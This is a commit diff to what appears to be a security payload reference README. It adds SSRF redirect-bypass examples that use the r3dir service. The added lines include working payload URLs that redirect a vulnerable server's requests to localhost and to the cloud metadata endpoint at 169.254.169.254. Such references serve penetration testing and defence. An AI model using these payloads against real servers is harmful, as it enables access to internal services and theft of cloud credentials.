Update SSRF with redirect examples using r3dir README.md

2024-12-18 10:26:09 +00:00 · 2024-06-27 16:57:45 +02:00 · 2024-06-27 16:57:45 +02:00 · 4cf17a3fab
commit 4cf17a3fab
parent 314e4da963
1 changed files with 11 additions and 1 deletions
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -263,6 +263,16 @@ vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
 3. You can use response codes [307](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/307) and [308](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/308) in order to retain HTTP method and body after the redirection.
 ```

+To perform redirects without hosting own redirect server or perform seemless redirect target fuzzing, use https://github.com/Horlad/r3dir which hosted on r3dir.me
+
+```powershell
+#Redirects to http://localhost with `307 Temporary Redirect` status code
+https://307.r3dir.me/--to/?url=http://localhost
+
+#Redirects to http://169.254.169.254/latest/meta-data/ with `302 Found` status code
+https://62epax5fhvj3zzmzigyoe5ipkbn7fysllvges3a.302.r3dir.me
+```
+
 ### Bypassing using type=url

 ```powershell
@ -929,4 +939,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
 - [SSRF: Don't encode entire IP](https://twitter.com/thedawgyg/status/1224547692967342080)
 - [Pong [EN]| FCSC 2024 - vozec - April 12, 2024](https://vozec.fr/writeups/pong-fcsc2024-en/)
 - [Pong [EN]| FCSC 2024 - mizu.re - Apr 13, 2024](https://mizu.re/post/pong)
- [SSRFmap - Introducing the AXFR module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/)
+- [SSRFmap - Introducing the AXFR module - Swissky - June 13, 2024](https://swisskyrepo.github.io/SSRFmap-axfr/)